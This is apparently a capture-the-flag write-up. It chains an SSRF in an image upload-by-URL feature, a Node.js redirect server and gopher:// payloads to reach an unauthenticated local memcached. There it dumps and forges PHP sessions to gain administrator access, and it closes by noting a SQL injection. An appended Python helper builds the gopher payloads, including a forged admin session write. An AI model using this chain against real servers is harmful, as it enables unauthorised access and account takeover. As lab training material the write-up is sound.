The upload module can fetch content from an external URL.

That means the server side probably uses curl or file_get_contents to fetch it; if the URL is not checked, this turns into an SSRF vulnerability.

The only check on the URL is that it must end with .jpg.

But the check is applied to the submitted URL only, so we can point it at our own server and answer with a 302 redirect to wherever we want.

nodeJS

const http = require('http');
// every path on this server (e.g. http://attacker:8000/x.jpg, which passes the .jpg check)
// answers with a 302 to the gopher:// target; port 8000 is arbitrary
http.createServer((request, response) => {
  response.writeHead(302, { 'Location': 'gopher://127.0.0.1:80/' });
  response.end();
}).listen(8000);

First I tried the file:// and php:// schemes, but both failed.

So the fetch is probably done with curl, which also supports gopher://.

I then used the gopher:// scheme to detect which local ports are open, since the response differs between a port that refuses the connection and one that accepts it.

As I guessed, port 11211 is open: a memcached server, which accepts commands without authentication from any local client, and the SSRF now makes us one.

Now we can build an attack chain. gopher:// hands raw bytes to the target port: the first character after the "/" is the gopher item type and is discarded (hence the "_"), and the spaces and the trailing CRLF of each memcached command are percent-encoded.

gopher://127.0.0.1:11211/_stats%20items%0d%0a

That sends `stats items`, which lists the slab ids in use; `stats cachedump <slab> <limit>` then dumps up to <limit> keys from that slab (5 and 100 here), and `get <key>` reads a value:

stats items
stats cachedump 5 100

The dump shows the session entries, which tells us that PHP stores its sessions in memcached.

pic1

To write a session of our own, use memcached's set command:

set <key> <flags> <exptime> <bytes>
<data>

(<bytes> must be the exact length of <data>.) Writing a session that marks us as administrator gets us into the administrator's account.
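Added example (my code, not the writeup's) for the memcached leg of the chain, from the port probe through `stats items`, `stats cachedump` and `set`: it wraps raw commands into gopher:// URLs the way the payload above is built, parses the two replies, and builds a `set` command with the byte count that memcached insists on. The host and port, the key names, the session value and the reply text are constructed values.

```python
from urllib.parse import quote

def gopher_url(host: str, port: int, raw: bytes) -> str:
    """Wrap raw bytes for a TCP service in a gopher:// URL.
    curl strips the first character after '/' as the gopher item type, so '_' is a
    throw-away selector; quote(safe='') percent-encodes spaces and CRLF as %20, %0D, %0A
    (uppercase hex, equivalent to the %0d%0a written by hand above)."""
    return f"gopher://{host}:{port}/_" + quote(raw, safe="")

def memcached_cmd(*lines: bytes) -> bytes:
    """Join command lines with the CRLF terminators memcached's text protocol requires."""
    return b"".join(line + b"\r\n" for line in lines)

def port_probe_urls(host: str, ports) -> dict:
    """Empty payload, one URL per port; open/closed is judged from the target's
    response or error for each URL (no network is touched here)."""
    return {port: gopher_url(host, port, b"") for port in ports}

def parse_stats_items(reply: bytes) -> list:
    """'STAT items:<slab>:<name> <value>' lines -> sorted slab ids that hold items."""
    slabs = set()
    for line in reply.decode(errors="replace").splitlines():
        if line.startswith("STAT items:"):
            slabs.add(int(line.split(":")[1]))
    return sorted(slabs)

def cachedump_cmd(slab: int, limit: int = 100) -> bytes:
    return memcached_cmd(f"stats cachedump {slab} {limit}".encode())

def parse_cachedump(reply: bytes) -> list:
    """'ITEM <key> [<bytes> b; <exptime> s]' lines -> keys."""
    return [line.split()[1] for line in reply.decode(errors="replace").splitlines()
            if line.startswith("ITEM ")]

def set_cmd(key: str, value: bytes, flags: int = 0, exptime: int = 0) -> bytes:
    """'set <key> <flags> <exptime> <bytes>' followed by the data block. <bytes> must be
    the exact length of the value, or memcached answers CLIENT_ERROR bad data chunk."""
    return memcached_cmd(f"set {key} {flags} {exptime} {len(value)}".encode(), value)

# Constructed replies, shaped like memcached's text protocol output (key names invented).
SAMPLE_STATS_ITEMS = b"STAT items:5:number 3\r\nSTAT items:5:age 42\r\nSTAT items:7:number 1\r\nEND\r\n"
SAMPLE_CACHEDUMP = b"ITEM memc.sess.key.abc123 [128 b; 0 s]\r\nITEM memc.sess.key.def456 [128 b; 0 s]\r\nEND\r\n"

if __name__ == "__main__":
    print(port_probe_urls("127.0.0.1", [80, 11211]))
    print(gopher_url("127.0.0.1", 11211, memcached_cmd(b"stats items")))
    for slab in parse_stats_items(SAMPLE_STATS_ITEMS):
        print(gopher_url("127.0.0.1", 11211, cachedump_cmd(slab)))
    print(parse_cachedump(SAMPLE_CACHEDUMP))
    # constructed session value; the real format depends on PHP's session serializer
    print(gopher_url("127.0.0.1", 11211, set_cmd("memc.sess.key.abc123", b"admin|i:1;")))
```

Each URL is submitted to the upload module through the redirect server; because the gopher payload is the whole request, one URL carries one command (or several joined by CRLF), and the server's reply is whatever the upload module shows back.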

pic2

But we still could not get the flag: the admin page only shows a notification.

pic3

Looking at the HTML source reveals a reference to backup code.

pic4

The backup code has an obvious SQL injection vulnerability.

pic5

Exploiting it finally gives us the flag.